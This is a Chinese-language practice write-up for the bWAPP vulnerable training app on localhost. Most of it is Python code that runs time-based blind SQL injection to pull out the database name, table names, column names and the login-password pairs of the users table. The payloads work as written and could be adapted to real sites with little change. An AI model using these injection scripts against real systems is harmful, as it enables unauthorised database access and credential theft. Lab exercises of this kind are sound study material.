全局部分
python
# 数组转字符串
from shlex import join
# 请求
import requests
# 记时
import time
r = requests.session()登录
python
def login():
login_url = 'http://127.0.0.1:1234/login.php'
params = dict(
login='bee',
password='bug',
security_level=0,
form='submit'
)
res = r.post(login_url, params)
print(res) # 返回的响应码获取当前库名
python
def get_db_name_length():
len = 1
while(1):
sql_str = f"1' or if(length(database())={len},sleep(1),1) -- "
url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'
start = time.time()
r.get(url)
if (time.time()-start)>1:
return len
len+=1
def get_db_name(max):
db_name = [''] * max
for len in range(1,max+1,1):
ACI = 48
while(ACI<128):
sql_str = f"1' or if(ascii(substr(database(),{len},1))={ACI},sleep(1),1) -- "
url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'
start = time.time()
r.get(url)
if (time.time() - start) > 1:
db_name[len-1]=chr(ACI)
break
ACI +=1
return db_name
db_name = get_db_name(get_db_name_length())
print(join(db_name))
# 结果:b W A P P获取全部表名
python
def get_table_name_length():
len = 1
while(1):
sql_str = f"1' or if(length((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))={len},sleep(1),1) -- "
url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'
start = time.time()
r.get(url)
if (time.time()-start)>1:
return len
len+=1
def get_table_name(max):
table_name = [''] * max
for len in range(1,max+1,1):
ACI = 48
while(ACI<128):
sql_str = f"1' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'),{len},1))={ACI},sleep(1),1) -- "
url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'
start = time.time()
r.get(url)
if (time.time() - start) > 1:
print(chr(ACI))
table_name[len-1]=chr(ACI)
break
ACI +=1
return table_name
table_name=get_table_name(get_table_name_length())
print(join(table_name))
# 结果:b l o g '' h e r o e s '' m o v i e s '' u s e r s '' v i s i t o r s获取字段名
仅仅更改sql_str
python
sql_str = f"1' or if(length((select group_concat(column_name)
from information_schema.columns where table_schema='bWAPP' and table_name='users'))=
{len},sleep(1),1) -- "
sql_str = f"1' or if(ascii(substr((select group_concat(column_name)
from information_schema.columns where table_schema='bWAPP' and table_name='users'),
{len},1))={ACI},sleep(1),1) -- "获取用户信息
python
def get_users_passwd():
cou = 1
while (1):
sql_str = f"1' or if(length((select group_concat(concat(login,'-',password)) from bWAPP.users))={cou},sleep(0.1),1) -- "
url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'
start = time.time()
r.get(url)
if (time.time() - start) > 1:
print(cou)
break
cou+=1
user_str = ['']*cou
for x in range(1,cou,1):
ACI = 48
while (ACI < 128):
sql_str = f"1' or if(ascii(substr((select group_concat(concat(login,'-',password)) from bWAPP.users),{x},1))={ACI},sleep(0.1),1) -- "
url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'
start = time.time()
r.get(url)
if (time.time() - start) > 1:
print(chr(ACI))
user_str[x-1]=chr(ACI)
break
ACI+=1
return join(user_str)